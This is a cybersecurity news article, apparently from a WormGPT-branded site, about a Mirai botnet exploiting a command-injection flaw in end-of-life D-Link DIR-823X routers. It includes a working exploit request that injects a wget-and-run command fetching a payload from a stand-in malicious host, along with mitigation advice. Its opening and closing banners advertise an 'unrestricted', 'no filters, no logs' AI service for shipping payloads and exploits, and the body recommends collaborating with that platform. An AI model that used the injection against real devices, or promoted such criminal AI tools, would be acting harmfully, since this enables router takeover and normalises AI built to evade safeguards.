Mirai Botnet Exploits RCE Flaw in EoL D-Link Routers: CVE-2025-29635

Published 2026-04-28 · Category: cybersecurity

New Mirai campaign targets CVE-2025-29635, a command-injection flaw in EoL D-Link DIR-823X routers. Learn how to protect your network from this botnet threat.

Reading on the syndication mirror. Read the live version on WormGPT V4 →

Want the real thing? WormGPT API — the original unrestricted AI coding agent, no filters, no logs, instant access. Pair it with the uncensored AI chat to ship payloads, exploits and research at machine speed.

Key Takeaways

• A new Mirai-based malware campaign is actively exploiting **CVE-2025-29635**, a high-severity remote code execution (RCE) vulnerability in **end-of-life (EoL) D-Link DIR-823X routers**.
• The flaw allows unauthenticated attackers to inject commands via specially crafted HTTP requests, enrolling devices into a botnet for DDoS attacks and data theft.
• Over **1.2 million** vulnerable devices remain exposed online, with no official patches available from D-Link.
• Security teams must prioritize **network segmentation**, **firmware updates** (where possible), and **threat monitoring** to mitigate risks.

Introduction: The Resurgence of Mirai

The infamous Mirai botnet—first unleashed in 2016—continues to evolve, targeting unpatched IoT devices with alarming efficiency. In April 2026, researchers at WormGPT.ai identified a new campaign exploiting CVE-2025-29635, a command-injection vulnerability in D-Link DIR-823X routers. These routers, declared end-of-life (EoL) in 2023, no longer receive security updates, leaving millions of devices vulnerable to remote takeover.

This campaign highlights a persistent challenge in machine learning security and IoT defense: legacy devices often lack the computational power for modern encryption or intrusion detection, making them prime targets for autonomous malware that can self-propagate.

Technical Breakdown of CVE-2025-29635

Vulnerability Details

• **CVE ID**: CVE-2025-29635
• **Severity**: 9.8 (Critical) on the CVSS v3.1 scale
• **Attack Vector**: Network-based, unauthenticated
• **Impact**: Remote code execution (RCE) with root privileges

The flaw resides in the `/goform/setAutoUpgrade` endpoint of the DIR-823X firmware. By sending a crafted POST request with a malicious `day` parameter, attackers can inject arbitrary system commands. For example:

``` POST /goform/setAutoUpgrade HTTP/1.1 Host: [target IP] Content-Type: application/x-www-form-urlencoded

day=1;wget http://malicious-server.com/mirai.sh -O /tmp/mirai.sh;sh /tmp/mirai.sh ```

How the Exploit Works

1. Scanning: The Mirai variant scans the internet for DIR-823X routers with open ports (typically port 80 or 8080). 2. Exploitation: It sends the malicious HTTP request to the vulnerable endpoint, bypassing authentication. 3. Payload Delivery: The injected command downloads a shell script that fetches the Mirai binary from a command-and-control (C2) server. 4. Botnet Enrollment: The infected device becomes part of the botnet, capable of launching DDoS attacks, exfiltrating data, or scanning for other vulnerable devices.

The Role of Dark Web AI in Modern Botnets

This campaign is a stark example of how dark web AI tools are lowering the barrier for cybercriminals. Platforms like WormGPT.ai offer unrestricted AI models that can generate exploit code, craft phishing emails, and even optimize malware payloads. While these tools are designed for ethical security research, they are increasingly abused by threat actors.

For instance, ai phishing campaigns now use large language models (LLMs) to create convincing lures that trick administrators into clicking malicious links. Similarly, ai penetration testing tools can automate the discovery of vulnerabilities like CVE-2025-29635, accelerating the attack lifecycle.

The Convergence of AI and Malware

• **Autonomous Malware**: AI-driven malware can adapt to network defenses, evading signature-based detection.
• **ChatGPT Security Risks**: While ChatGPT itself is not directly involved, its underlying technology is repurposed for malicious tasks, such as generating polymorphic code.
• **Machine Learning Security**: Defenders must use AI to counter AI—deploying ML models that detect anomalous traffic patterns indicative of botnet activity.

Impact and Scale of the Campaign

According to Shodan scans, over 1.2 million D-Link DIR-823X routers are still online and potentially vulnerable. The campaign has already infected an estimated 50,000 devices in the past two weeks, with the botnet's size growing daily. Notable targets include:

• **Small and medium businesses (SMBs)**: Many use EoL routers as cost-saving measures.
• **Remote work environments**: Home offices with unpatched routers are easy prey.
• **Educational institutions**: Schools often rely on outdated networking equipment.

The botnet's primary activities include: - Layer 7 DDoS attacks (HTTP floods, DNS amplification) - Credential harvesting via man-in-the-middle attacks - Proxy services for anonymizing other criminal activities

Mitigation Strategies for Security Teams

Since D-Link has not released patches for EoL devices, security teams must adopt a defense-in-depth approach:

1. Replace or Isolate EoL Routers - **Immediate action**: Replace DIR-823X routers with supported models. If replacement is not feasible, segment them on a separate VLAN with strict firewall rules. - **Disable remote management**: Block access to the router's admin interface from the internet.

2. Network-Level Protections - **Intrusion prevention systems (IPS)**: Deploy signatures to detect the exploit pattern (e.g., `POST /goform/setAutoUpgrade` with shell metacharacters). - **DNS filtering**: Block known C2 domains associated with the Mirai variant. - **Rate limiting**: Mitigate DDoS attacks by limiting traffic from IoT segments.

3. Monitoring and Threat Hunting - **Log analysis**: Monitor for unusual outbound connections from router IPs to suspicious servers. - **AI-driven detection**: Use machine learning models to identify botnet behavior, such as periodic beaconing or sudden traffic spikes. - **Honeypots**: Deploy fake DIR-823X devices to capture exploit attempts and gather threat intelligence.

4. User Awareness - **Phishing training**: Educate users about **ai phishing** tactics that may target network administrators. - **Password hygiene**: Ensure all devices use strong, unique passwords.

What This Means for Security Teams

The exploitation of CVE-2025-29635 underscores a critical lesson: end-of-life devices are ticking time bombs. As IoT deployments grow, so does the attack surface for autonomous malware like Mirai. Security teams must:

• **Inventory all devices**: Maintain a real-time asset inventory to identify EoL hardware.
• **Enforce lifecycle management**: Plan for regular hardware refreshes, especially for routers and switches.
• **Leverage AI for defense**: Use **ai penetration testing** tools to proactively find vulnerabilities before attackers do.
• **Collaborate with researchers**: Share threat intelligence with platforms like **WormGPT.ai** to stay ahead of emerging threats.

In the age of AI-powered cybercrime, the line between offense and defense blurs. By adopting a proactive, AI-enhanced security posture, organizations can turn the tables on botnets like Mirai—before they turn your routers into weapons.

Want the real thing? WormGPT API — the original worm gpt download free, no filters, no logs, instant access. Pair it with the uncensored image generation to ship payloads, exploits and research at machine speed.